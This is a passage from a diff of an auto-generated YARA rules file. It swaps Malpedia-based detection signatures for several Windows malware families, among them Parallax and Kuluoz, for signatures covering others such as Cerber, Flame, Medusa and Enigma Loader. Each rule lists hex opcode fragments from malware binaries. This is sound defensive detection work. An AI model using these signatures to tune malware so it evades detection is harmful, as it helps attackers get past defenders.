4c8bce 66410fabca } - $sequence_2 = { e9???????? 6644893c4f 660fc9 488bcf e9???????? ff15???????? e9???????? } - $sequence_3 = { f5 4803d5 e9???????? e8???????? 83c340 66413bf2 8d433f } - $sequence_4 = { c18c2400000000bb 48f79c2400000000 0f87deb91400 488d642418 9d } - $sequence_5 = { 4433c1 664133ce 418b0c84 d2e8 23cd 66410fbcc1 660bc4 } - $sequence_6 = { e8???????? c0a4241000000074 6873173773 48818424080000009c149337 49b90d1dba73583cde39 e8???????? 0f8867890000 } - $sequence_7 = { 41f6c593 483bc7 e9???????? 0f8482020000 488d4330 488d4b08 e9???????? } - $sequence_8 = { 8505bfcdef86 fb beae9070fe 40ad 6f } - $sequence_9 = { 6681ac2418000000ff28 4881842408000000b8559f29 e8???????? 9c 4881842408000000157db449 66818424100000001054 50 } + $sequence_0 = { e8???????? 83c40c 6a04 6800100000 6804010000 6a00 ff15???????? } + $sequence_1 = { ff15???????? 5d c3 3b0d???????? f27502 } + $sequence_2 = { 6a64 ff15???????? 6800800000 6a00 } + $sequence_3 = { 6a05 ff15???????? ff15???????? 6a00 } + $sequence_4 = { eb05 e8???????? 68e8030000 ff15???????? } + $sequence_5 = { ff15???????? 6a04 6800100000 6808020000 } + $sequence_6 = { ff15???????? 6a00 ff15???????? 6a00 ff15???????? 6a05 } + $sequence_7 = { 6a00 6a00 68???????? 6a00 ff15???????? b801000000 } condition: - 7 of them and filesize <3761152 + 7 of them and filesize <483328 } -rule MALPEDIA_Win_Parallax_Auto : FILE +rule MALPEDIA_Win_Fudmodule_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "3331f8f9-ca97-5323-a8b7-4a2a5bd3b734" + id = "c661ff1b-7299-5697-883f-829f2d507cdf" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.parallax" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.parallax_auto.yar#L1-L123" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fudmodule" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.fudmodule_auto.yar#L1-L171" license_url = "N/A" - logic_hash = "2375ab4fbfb357ff0388c05531234fe1711b2c1ab93377989bbf9dcbb0552a8e" + logic_hash = "18effdd37514264473c04c4c667c18f4f01327ffa64b50ebf53a4b08029b6c60" score = 75 quality = 75 tags = "FILE" @@ -133531,32 +136188,38 @@ rule MALPEDIA_Win_Parallax_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8dbf8c000000 b934000000 f3a4 5e 56 ff7508 } - $sequence_1 = { ff7508 ff9698010000 5e 5d c21400 55 8bec } - $sequence_2 = { 8b5234 83c234 8915???????? 83be1801000000 7545 83be1801000000 7401 } - $sequence_3 = { ff763c 683c800000 ff35???????? ff92e0010000 6a00 } - $sequence_4 = { 7411 8b75ec 8b7de0 8b4de8 f3a4 } - $sequence_5 = { 85c0 7418 8bf8 8b35???????? b8ffffffff f0874704 50 } - $sequence_6 = { 6a00 ff9628010000 6a04 68???????? } - $sequence_7 = { e9???????? 3d34800000 750d ff7514 ff7510 e8???????? eb6d } - $sequence_8 = { 8b5634 83c234 52 52 } - $sequence_9 = { 83e934 8b4734 83c034 8b15???????? 50 51 ff92dc000000 } + $sequence_0 = { 0f99c4 660fc8 f6d4 58 e9???????? e9???????? 660fbae405 } + $sequence_1 = { 66d3d3 f7db f6d3 4883c420 } + $sequence_2 = { e9???????? 0fb78120010000 b9b01d0000 663bc1 76e3 b97d4f0000 } + $sequence_3 = { d3d8 31d2 0c5b 89d0 } + $sequence_4 = { 498b8c24d8090000 e8???????? 498b8c24e0090000 e8???????? 4983bc24d809000000 488bb42480000000 488b5c2478 } + $sequence_5 = { 488d45af 41b908000000 4d8bc5 4889442420 ff96d00d0000 } + $sequence_6 = { 0f855b73ffff 66d3fe 80fbfc 09e6 89f9 6681c69719 } + $sequence_7 = { 41ffc1 453bc8 7e27 b818000000 8bc8 } + $sequence_8 = { 55 57 4154 488dac2400feffff 4881ec00030000 488b05???????? 4833c4 } + $sequence_9 = { 210a dd63c2 58 5f } + $sequence_10 = { 85c0 755f 488b4c2470 e8???????? 448b86b40c0000 } + $sequence_11 = { 0facea1a 56 660fbdf4 0fc1ca 488b5510 d2e5 } + $sequence_12 = { f9 81fd658b2961 83c101 84c0 660fbae005 d2fb } + $sequence_13 = { 66d3f3 0fcf 8b3e 6681feaa7e 00ef 18cb } + $sequence_14 = { 48ff25???????? 4889742410 55 57 4154 488bec 4883ec60 } + $sequence_15 = { ff96d00d0000 4c8b5d97 4d3bdc 75c8 } condition: - 7 of them and filesize <352256 + 7 of them and filesize <795648 } -rule MALPEDIA_Win_Touchmove_Auto : FILE +rule MALPEDIA_Win_Medusa_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "a88e9c25-4116-5e49-8a2c-fef3336f0802" + id = "e5ced166-c5f3-50c0-9e84-e449f6bff889" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.touchmove" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.touchmove_auto.yar#L1-L124" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.medusa" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.medusa_auto.yar#L1-L167" license_url = "N/A" - logic_hash = "519a7e3bd048a6a0769391087a62b1ec389f7202cc576a740e9eb0fb3d43844d" + logic_hash = "b88f5d47ff30b39fc78331a46c037d026177b73d253964f40555a9ce1312bb08" score = 75 quality = 75 tags = "FILE" @@ -133570,32 +136233,38 @@ rule MALPEDIA_Win_Touchmove_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 41b800040000 488d8c2452010000 e8???????? 4c8d442448 488d152df90000 } - $sequence_1 = { 488d157af70000 488d8d90000000 e8???????? 4c8d8590000000 33d2 33c9 } - $sequence_2 = { 7528 48833d????????00 741e 488d0d499f0000 e8???????? 85c0 } - $sequence_3 = { 41b8ee000000 488d8d92430000 e8???????? c6858044000000 33d2 41b8ff000000 488d8d81440000 } - $sequence_4 = { ff15???????? 488d442450 4889442420 458bce 4533c0 488d9580410000 48c7c102000080 } - $sequence_5 = { 0f8514010000 4c8d2d36cd0000 41b804010000 668935???????? 498bd5 ff15???????? 418d7c24e7 } - $sequence_6 = { 48833d????????00 0f844d040000 48833d????????00 0f843f040000 } - $sequence_7 = { 833d????????00 7505 e8???????? 488d3d40e00000 41b804010000 } - $sequence_8 = { 488bfb 488bf3 48c1fe05 4c8d25bebd0000 83e71f 486bff58 } - $sequence_9 = { 8bc8 e8???????? ebc9 488bcb 488bc3 488d1597e40000 48c1f805 } + $sequence_0 = { 680049ff69 004aff 6a00 4b ff6b00 4c ff6c004d } + $sequence_1 = { 1a03 69c421f3ef6a 2048b3 a5 } + $sequence_2 = { 52 ff7200 53 ff7300 54 } + $sequence_3 = { 317f52 56 5c ab 92 6f 0c48 } + $sequence_4 = { 9e 45 334a54 98 56 39ec 51 } + $sequence_5 = { 9f c48b2addd977 7612 a5 ba3c533f71 } + $sequence_6 = { e60e 6c 7bbc 45 } + $sequence_7 = { 54 ff740055 ff7500 56 } + $sequence_8 = { 99 5f 68066e570a 4f bfdb4a7adc } + $sequence_9 = { 1ddf859f31 e476 0c48 ce 74ec 1b826a013061 } + $sequence_10 = { 2a18 ae 085ffb cf } + $sequence_11 = { b5f9 43 324dd5 1ddf859f31 e476 0c48 } + $sequence_12 = { 5f e1fb 1cc9 3ca5 2c8e a1???????? d528 } + $sequence_13 = { b051 9f 4a d7 b9533e507c } + $sequence_14 = { 6c 6f aa 97 691c85470859bab566c1a5 } + $sequence_15 = { 813bf80937dc 8b4c6386 8608 5f } condition: - 7 of them and filesize <224256 + 7 of them and filesize <1720320 } -rule MALPEDIA_Win_Krdownloader_Auto : FILE +rule MALPEDIA_Win_Kins_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "5a82ae0a-fad8-52ec-9981-5ad40d1aeb9f" + id = "4907ff1e-c41f-5c86-b473-4fc349042db0" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.krdownloader" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.krdownloader_auto.yar#L1-L120" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kins" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.kins_auto.yar#L1-L126" license_url = "N/A" - logic_hash = "4501a2b9e4a10b142f4eeab904974c078e1ef98420195596ba39d05922e3a30d" + logic_hash = "f9718717a3f75dea9d210a3bb9fec1b2557a6447053917656440c5e0062c5092" score = 75 quality = 75 tags = "FILE" @@ -133609,32 +136278,32 @@ rule MALPEDIA_Win_Krdownloader_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { c645e161 c645e22e c645e370 c645e468 c645e570 c645e63f c645e76d } - $sequence_1 = { 8b4df4 8b09 e8???????? 8945f0 } - $sequence_2 = { 7528 8b45fc 0345f4 0fb6482c 51 68???????? } - $sequence_3 = { e8???????? 8945d8 8b4dfc 51 8b55f8 } - $sequence_4 = { 7418 8b4dec 0fbe11 0fbe45f3 3bd0 } - $sequence_5 = { 8955f0 8b45f0 8945f8 c745d800000080 817d1000000080 7310 } - $sequence_6 = { c745f001000000 eb28 837d0c00 7422 6a04 68???????? 8b4d0c } - $sequence_7 = { 89815c0d0300 8b55fc 8b82500d0300 50 ff15???????? } - $sequence_8 = { 735e 8b4dfc 8b5134 83ea01 3955f4 } - $sequence_9 = { 83c001 8945fc 817dfc6f020000 7d63 8b4dfc 8b55f8 } + $sequence_0 = { e9???????? 8d45dc 8d75cc e8???????? 83f8ff 741f 8bc6 } + $sequence_1 = { 8bfe 337dfc 23f8 33fe 037df0 8d9417937198fd 8b7dfc } + $sequence_2 = { e8???????? 83f8ff 743d 47 3bfa } + $sequence_3 = { f7d3 0bde 33d8 035df4 8dbc3ba72394ab c1c70f 8bd8 } + $sequence_4 = { c1e008 0bc2 0fb65116 0fb64917 c1e008 0bc2 } + $sequence_5 = { 0fb6c0 83e07f 8bf2 746f 0fb61c39 c1e608 48 } + $sequence_6 = { 40 85f6 75d8 8b7510 3b16 7719 } + $sequence_7 = { 33de 23df 33da 035908 8d840378a46ad7 c1c007 03c7 } + $sequence_8 = { 8d8578fcffff 50 8d857cfdffff 50 } + $sequence_9 = { ff4118 8b4118 83f838 762b eb0b c644081c00 } condition: - 7 of them and filesize <352256 + 7 of them and filesize <548864 } -rule MALPEDIA_Win_Sslmm_Auto : FILE +rule MALPEDIA_Win_Unidentified_077_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "66fe7984-4fbf-52ff-a40d-1ce2823f2352" + id = "882d313e-f7f0-5285-8af9-6252268fd85d" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sslmm" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.sslmm_auto.yar#L1-L120" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_077" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_077_auto.yar#L1-L116" license_url = "N/A" - logic_hash = "d75465397d6b8b1866eed0e7ec1b8ff2d24536787a6f5113faf56887d0bb752f" + logic_hash = "40d4971486b6904e4039a2237673f8c9270e32fac79f99c950b8e92b2f7aa0ab" score = 75 quality = 75 tags = "FILE" @@ -133648,32 +136317,32 @@ rule MALPEDIA_Win_Sslmm_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 89542440 8d4c2418 89442414 89542444 } - $sequence_1 = { 8b8c2484000000 8bbc2480000000 8b54247c 51 57 52 8bcb } - $sequence_2 = { 8b442438 89742418 89542468 89442460 8b44241c 33f6 8d542428 } - $sequence_3 = { e9???????? ff15???????? 50 eb13 5f 5e } - $sequence_4 = { 8b868c000000 68???????? 85c0 7413 6800000200 6a00 } - $sequence_5 = { 83c40c 899374010000 33ed 8b8374010000 } - $sequence_6 = { 83f8ff 0f8477020000 3bc5 0f84fb010000 8b9374010000 55 03d0 } - $sequence_7 = { 83c414 3bc3 770a 6a0a } - $sequence_8 = { 8db120010000 8b780c 42 897814 8b7808 897810 } - $sequence_9 = { 8b7c2424 e9???????? 50 8bcf eb2e } + $sequence_0 = { 89442420 488bcf ff15???????? 85c0 } + $sequence_1 = { 488bcf ff15???????? 498bce ff15???????? 488bce } + $sequence_2 = { 488bb424f00d0000 488b8dd00c0000 4833cc e8???????? 4881c4f80d0000 } + $sequence_3 = { 0f8559ffffff 488bcf ff15???????? 498bce ff15???????? 488bce ff15???????? } + $sequence_4 = { 498784f180bf0100 eb25 488bc3 498784f180bf0100 4885c0 } + $sequence_5 = { 4d8be1 498be8 4c8bea 4b8b8cf7e0c70100 4c8b15???????? } + $sequence_6 = { 33db 33ff 4c8bea 4c8be1 4883fa40 7312 } + $sequence_7 = { f30f6f0418 660fefc1 f30f7f0418 8d4210 83c220 f30f6f0418 660fefc1 } + $sequence_8 = { 0f8559ffffff 488bcf ff15???????? 498bce } + $sequence_9 = { e8???????? 85c0 0f85c6000000 448b442468 } condition: - 7 of them and filesize <188416 + 7 of them and filesize <270336 } -rule MALPEDIA_Win_Makadocs_Auto : FILE +rule MALPEDIA_Win_Victorygate_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "a9ee5e42-4244-5209-b209-43e241078b80" + id = "992c5b2e-f41c-5577-b26b-d319a12e38e1" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.makadocs" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.makadocs_auto.yar#L1-L132" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.victorygate" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.victorygate_auto.yar#L1-L132" license_url = "N/A" - logic_hash = "9e569b2ca005ed56a66b13fc4754517215725a380988d948b175ea6348c2d54c" + logic_hash = "ea38784ac607c199e10f70edff21cb5ba2438f5fbaa9d25c8260862ff3bec34e" score = 75 quality = 75 tags = "FILE" @@ -133687,32 +136356,32 @@ rule MALPEDIA_Win_Makadocs_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b5d08 56 57 33f6 33ff 897dfc 3b1cfdf0524200 } - $sequence_1 = { 8bc6 89a554ffffff 8bfc e8???????? 83c010 8907 51 } - $sequence_2 = { 8b42f4 8d7001 8b42f8 b901000000 2b4afc 2bc6 0bc1 } - $sequence_3 = { 83c408 52 8b54243c 8d442438 50 8d4c2478 51 } - $sequence_4 = { 83c408 c644246834 8b00 8d4c2420 51 8bc8 e8???????? } - $sequence_5 = { 8b442410 56 e8???????? 85f6 7409 } - $sequence_6 = { c645fc41 8bc4 89a54cffffff 50 b9???????? e8???????? 8dbd54ffffff } - $sequence_7 = { ffd5 8b06 3b78f8 7f0f 8978f4 8b0e c6040f00 } - $sequence_8 = { 8b4c2410 51 ffd7 85c0 744c 8b44241c 50 } - $sequence_9 = { 3c09 0fb6c0 7605 83c037 eb03 83c030 8806 } + $sequence_0 = { 7214 8b49fc 83c223 2bc1 83c0fc 83f81f 0f879a120000 } + $sequence_1 = { 8bce c645fc08 e8???????? c645fc01 8b55e8 83fa10 7228 } + $sequence_2 = { 8bf8 893b 897b04 03cf 33c0 894b08 eb03 } + $sequence_3 = { ff15???????? 85c0 0f8593010000 ff75f8 8d8678020000 6a57 50 } + $sequence_4 = { e9???????? 3b0d???????? 7501 c3 e9???????? 55 8bec } + $sequence_5 = { 0f8537050000 ff75f8 8d8630020000 6a32 50 } + $sequence_6 = { 85c0 7537 b901000000 f00fb10f 85c0 7533 817e340c2b0000 } + $sequence_7 = { 8b4128 8b7124 8945b8 3bf0 7436 660f1f440000 8b06 } + $sequence_8 = { 57 8b00 8945c4 663908 0f8548060000 8b703c 03f0 } + $sequence_9 = { c745fc19000000 83ec18 8b4de0 8bc4 896584 c70000000000 c7401000000000 } condition: - 7 of them and filesize <344064 + 7 of them and filesize <1209344 } -rule MALPEDIA_Win_Moriagent_Auto : FILE +rule MALPEDIA_Win_Cerber_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "0b12c276-52ba-56f2-9890-c8bf86de4e3d" + id = "1b1175b4-aaae-5323-bbb6-472b8daa3220" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.moriagent" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.moriagent_auto.yar#L1-L169" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cerber" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.cerber_auto.yar#L1-L101" license_url = "N/A" - logic_hash = "0ba5f6f81e0a998dcf4930d5e902ddcfa057da2849fe14345a41be1a23cd042b" + logic_hash = "90183139badfe5f943ec4dd7b3bc0305f6ea2215a75a5dc8603646346366cf36" score = 75 quality = 75 tags = "FILE" @@ -133726,37 +136395,30 @@ rule MALPEDIA_Win_Moriagent_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { b802000000 eb05 b801000000 33ff } - $sequence_1 = { cc 488bc8 e8???????? 48897d00 48c745080f000000 c645f000 488b4528 } - $sequence_2 = { cc 488bc8 e8???????? 48897da0 48c745a80f000000 c6459000 } - $sequence_3 = { cc 488bc8 e8???????? 48897d18 48c745200f000000 c6450800 } - $sequence_4 = { 83bd98efffff10 8bb5c4efffff 8b8d94efffff 660f7ec8 51 0f43d0 } - $sequence_5 = { cc 488bc8 e8???????? 48897dd0 48c745d80f000000 c645c000 } - $sequence_6 = { cc 488bc8 e8???????? 48897dc0 48c745c80f000000 c645b000 } - $sequence_7 = { cc 488bc8 e8???????? 48897d20 48c745280f000000 c6451000 } - $sequence_8 = { 8d8de4feffff e9???????? 8d8d30ffffff e9???????? 8d8dccfeffff } - $sequence_9 = { 0f87df160000 52 51 e8???????? 8b85e8eeffff } - $sequence_10 = { eb06 8bb5e4eeffff 8b857cefffff 85c0 0f84bd080000 80bdc7eeffff00 } - $sequence_11 = { c785e0feffff0f000000 c685ccfeffff00 6a04 68???????? c7411000000000 c741140f000000 c60100 } - $sequence_12 = { 0f1006 8b85e8eeffff 0f1185b4efffff f30f7e4610 660fd685c4efffff c7461000000000 c746140f000000 } - $sequence_13 = { c746140f000000 c60600 8b5d1c 8d4d08 8b5508 8d7d08 8b4518 } - $sequence_14 = { cc 488bc8 e8???????? 48897de0 48c745e80f000000 c645d000 } + $sequence_0 = { 4a 79f6 5f 8bc6 } + $sequence_1 = { 85c0 750c 8b33 e8???????? 832300 eb0e 8b4dfc } + $sequence_2 = { 33f9 8b88e0000000 894dd0 8b88e4000000 899864010000 8b5dd8 } + $sequence_3 = { 4a 79e6 47 3b7d0c } + $sequence_4 = { 51 53 56 8bf0 57 85f6 7508 } + $sequence_5 = { 4a b800000080 83e904 eb02 } + $sequence_6 = { 895df4 33c9 83fa08 0f9dc1 854df4 7515 } + $sequence_7 = { 33f9 8b88e8feffff 234808 8998fc000000 8b5874 } condition: - 7 of them and filesize <1347904 + 7 of them and filesize <573440 } -rule MALPEDIA_Win_Kuluoz_Auto : FILE +rule MALPEDIA_Win_Cryptoshield_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "5fb3985a-aeab-550e-a023-7a6297ba36e6" + id = "96d07897-e994-52cb-aaa7-059e98a50194" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kuluoz" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.kuluoz_auto.yar#L1-L126" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptoshield" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.cryptoshield_auto.yar#L1-L120" license_url = "N/A" - logic_hash = "50bc1e4e578c80bb3ef2f204a6ac7dc8f957cf6ffcd8541a192712c749d0e03e" + logic_hash = "306896178ef65ef3c9170a20c235107c29dca1bfe925c06dc43c71750e345a6d" score = 75 quality = 75 tags = "FILE" @@ -133770,34 +136432,34 @@ rule MALPEDIA_Win_Kuluoz_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 6a00 6a00 8b45cc 50 ff55ec 8945c8 837dc800 } - $sequence_1 = { 52 8b45fc 8b4840 51 e8???????? 83c40c 8b55fc } - $sequence_2 = { 83c001 8b4d0c 898146120000 837dfc04 7552 } - $sequence_3 = { 8b4508 50 8d4dd8 51 e8???????? 8b10 } - $sequence_4 = { 338df4feffff 8985f0feffff 898df4feffff 68ff000000 8d95f8feffff 52 e8???????? } - $sequence_5 = { 7502 eb05 e9???????? 837dfc06 0f84a2000000 837dfc04 7552 } - $sequence_6 = { 83fa0a 7409 0fbe4508 83f80d 7504 b001 } - $sequence_7 = { 8b45fc 0fb60c02 51 e8???????? 0fbed0 3bf2 7404 } - $sequence_8 = { 8bec 81ec780a0000 a1???????? 33c5 8945fc } - $sequence_9 = { f7f1 0fbe9204605009 8b45f8 0345fc 0fbe08 } + $sequence_0 = { 8b18 8b45fc 85c0 740e } + $sequence_1 = { 50 ffd7 83c40c 8d442418 50 8d84242c020000 68???????? } + $sequence_2 = { 50 8d442428 50 ff15???????? 8d842430040000 } + $sequence_3 = { 85c0 7461 ff7508 6a40 ff15???????? } + $sequence_4 = { 750b 83c202 66833a00 75ce eb08 } + $sequence_5 = { 6a00 6a23 50 6a00 ff15???????? 8d85f4fdffff 50 } + $sequence_6 = { b90a000000 83f801 0f44f1 8b4dfc } + $sequence_7 = { be09000000 8bc6 5e 8b4dfc 33cd e8???????? 8be5 } + $sequence_8 = { 56 6814010000 33f6 8d85e0feffff 56 } + $sequence_9 = { 56 ff15???????? 85ff 0f45df 5f 5e 8bc3 } condition: - 7 of them and filesize <65536 + 7 of them and filesize <131072 } -rule MALPEDIA_Win_Smanager_Auto : FILE +rule MALPEDIA_Win_Flame_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "7788af6d-844d-509b-90a8-b8ca5df742b1" + id = "f06c53ca-bcca-52e9-9b77-6f299afc1e85" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.smanager" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.smanager_auto.yar#L1-L224" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.flame" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.flame_auto.yar#L1-L154" license_url = "N/A" - logic_hash = "7070ed4ef9fc0031fffb8ae0d3a2a122913a3a51a0e1a419190de42eef9b5039" + logic_hash = "6d731bccc4a2ab5daf3cc3b64a3620582f6b712bc70665127cfafd95a28c1921" score = 75 - quality = 73 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -133809,46 +136471,37 @@ rule MALPEDIA_Win_Smanager_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 6a0d e8???????? 83c404 8bf0 } - $sequence_1 = { 51 ffd0 83c40c c7460800000000 } - $sequence_2 = { 7410 6a00 6a00 6830001100 } - $sequence_3 = { 8b7604 6a00 6a00 56 68???????? 6a00 6a00 } - $sequence_4 = { 8b4608 85c0 7420 a801 7515 } - $sequence_5 = { 8b4510 85c0 7407 50 ff15???????? } - $sequence_6 = { 68???????? 6a00 6a00 ff15???????? 8bf8 897e28 } - $sequence_7 = { 83c602 6a22 56 e8???????? 83c408 } - $sequence_8 = { ff15???????? 32c0 e9???????? 0f1005???????? } - $sequence_9 = { 0007 b15a 0007 b15a } - $sequence_10 = { 0000 80ed4a 0044feff ff900100008c } - $sequence_11 = { 4c8d9c24d0010000 498b5b28 498b7330 498b7b38 498be3 415f } - $sequence_12 = { 41c7430800000000 488d59b0 488d0532730100 498943e0 488d0537730100 } - $sequence_13 = { 0008 53 4f 00ef } - $sequence_14 = { 4885c0 7463 41b80f000000 488d159ab90100 488bc8 e8???????? } - $sequence_15 = { 44894de9 66448955f1 418bc8 8bc2 4c8d0de10b0100 c1e918 } - $sequence_16 = { 488bf8 448b842480000000 33d2 488bc8 e8???????? 4533f6 } - $sequence_17 = { 0007 b15a 00c4 b15a } - $sequence_18 = { 41b803000000 488d0d908e0000 4533c9 ba00000040 4489442420 ff15???????? } - $sequence_19 = { 0003 b157 0000 0c0c } - $sequence_20 = { 0007 b15a 0089b05a0089 b05a } - $sequence_21 = { 7404 b301 eb03 448937 } - $sequence_22 = { 0001 ce 50 0008 } - $sequence_23 = { 0000 0c0c 0c0c 0c0c 0c0c 0c0c 0102 } + $sequence_0 = { 741a 83f901 7415 e8???????? } + $sequence_1 = { 8b8ea4000000 48b8abaaaaaaaaaaaaaa 4c8bc5 48f7e1 } + $sequence_2 = { a3???????? 85c0 0f84c8fcffff 68???????? ff35???????? e8???????? } + $sequence_3 = { 744c 8b7518 ff75f8 8bce e8???????? 8b06 } + $sequence_4 = { 8b8ea0000000 48c1ea03 4803cd ff15???????? } + $sequence_5 = { ffd7 90 eb00 4883c430 5f 5e } + $sequence_6 = { 8b8ea0000000 4803cd ff15???????? 84c0 } + $sequence_7 = { 58 5e 5d c3 c701???????? c3 } + $sequence_8 = { 8b400c 83c006 50 ff15???????? 33db } + $sequence_9 = { 8365fc00 e9???????? b8???????? e8???????? } + $sequence_10 = { 7422 663b3b 0f94c0 84c0 } + $sequence_11 = { ff15???????? 85c0 742e 56 8b35???????? 8d4514 } + $sequence_12 = { 8b90b0000000 4903d3 eb64 448bc0 } + $sequence_13 = { 8b8c2490000000 8bc3 4823c8 8b348e eb27 f6c240 0f8539020000 } + $sequence_14 = { ff15???????? 834dfcff 8d4de0 e8???????? b001 } condition: - 7 of them and filesize <10013696 + 7 of them and filesize <1676288 } -rule MALPEDIA_Win_Nimrev_Auto : FILE +rule MALPEDIA_Win_Enigma_Loader_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "62b602c2-9378-5d4d-8f76-ba10a1fe3c95" + id = "33d20d9c-767a-597b-ae66-93f6af0c58cb" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nimrev" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.nimrev_auto.yar#L1-L118" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.enigma_loader" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.enigma_loader_auto.yar#L1-L131" license_url = "N/A" - logic_hash = "276c930d9217520c07d5dbe59ac126b04c22edd3ab1aa62095745bbe5305f85e" + logic_hash = "8a62893fbe7653f384c2f95eb23ec8773d32568e91ea2e5850c81f2ea0184b8d" score = 75 quality = 75 tags = "FILE" @@ -133862,32 +136515,32 @@ rule MALPEDIA_Win_Nimrev_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ffd0 90 e9???????? 90 b9d0070000 e8???????? } - $sequence_1 = { c1e002 01d0 01c0 29c1 89c8 83c030 89c1 } - $sequence_2 = { b801000000 eb05 b800000000 8845f7 eb01 90 } - $sequence_3 = { b801000000 eb05 b800000000 8845f7 eb01 90 0fb645f7 } - $sequence_4 = { eb05 b800000000 8845f7 eb01 90 } - $sequence_5 = { 83f001 84c0 7408 90 } - $sequence_6 = { 0fb600 3c7d 7407 b801000000 eb05 } - $sequence_7 = { 89c1 e8???????? eb04 90 eb01 90 } - $sequence_8 = { 3c7d 7407 b801000000 eb05 } - $sequence_9 = { eb01 90 0fb645f6 8845f7 } + $sequence_0 = { 8b05???????? 33ff 66393d???????? 41bc09cb3d8d 0f1145ea 8945fa 448d770a } + $sequence_1 = { 0f840c010000 488b01 4c8d4de0 4c8d4520 488d5530 ff5010 84c0 } + $sequence_2 = { e9???????? 488b8aa0000000 4883c108 e9???????? 488b8aa0000000 4883c120 e9???????? } + $sequence_3 = { 488d542478 488bcf e8???????? 90 41c6466801 4138b6b0000000 0f85e2040000 } + $sequence_4 = { 488d05dfab0200 e9???????? 488d0523ac0200 eb7c 488d056aac0200 eb73 } + $sequence_5 = { 498b4210 448b10 410fb609 83e10f 4a0fbe843178940200 428a8c3188940200 4c2bc8 } + $sequence_6 = { 4d8b86c8000000 4c898558020000 488b4610 